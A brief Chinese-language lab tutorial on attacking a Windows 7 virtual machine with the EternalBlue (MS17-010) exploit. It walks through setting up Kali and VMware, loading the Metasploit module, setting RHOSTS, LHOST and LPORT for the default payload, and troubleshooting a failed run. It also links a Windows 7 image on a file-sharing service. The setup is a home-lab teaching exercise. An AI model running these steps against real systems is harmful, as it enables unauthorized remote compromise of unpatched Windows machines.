kali下载地址:https://www.kali.org/
win7镜像下载地址链接:https://pan.baidu.com/s/1ZE1ZDluxZVVk3NOINQpgkQ?pwd=6666
密码:6666
Vmware下载地址https://www.vmware.com/cn.html
永恒之蓝
1.输入sudo su进入root模式 密码默认为kali
2.进入msfconsole
3.这边有二种方法查找永恒之蓝
第一种已知直接写
use exploit/windows/smb/ms17_010_eternalblue
第二种微软把永恒之蓝设置编号为2017年第10个漏洞
search ms17_010
查看完成之后发现编号为0
use 0
4.查看必选项
show options
标记的为yes必须修改的选项
RHOSTS为被攻击对象
PRORTSMBDomain为端口默认为445
Payload options是载荷的意思 后面为默认载荷
LHOST为kali的ip地址
LPORT端口选择一个不占用的即可
5.查看win7地址
win+R打开 输入cmd 在命令行里面输入ipconfig查看ip地址
6.设置必选项
7.运行模块
攻击成功
可以help查看有什么好玩的东西
8.为什么运行不超过
win7防火墙是否关闭
kali和win7地址是否在同一个网段?是否可以互相ping通?
查看show options RHOSTS是否是win7的ip地址?是否端口被占用?